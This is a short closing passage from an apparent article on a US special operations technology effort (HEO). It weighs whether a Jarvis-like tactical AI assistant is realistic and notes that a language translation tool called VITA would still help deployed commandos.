Perhaps, like TALOS, the promise of a tactical AI assistant like Tony Stark’s Jarvis sidekick may prove simply too ambitious for military engineers to realize in a fully formed product. But even if the HEO effort ends up only fielding, say, the VITA language translation tool, it will still represent a major boost in capabilities for US special operators deployed abroad. The day is slowly turning into night, but American commandos own the night and, with the help of the HEO, will do so well into the next conflict.

Tag

#web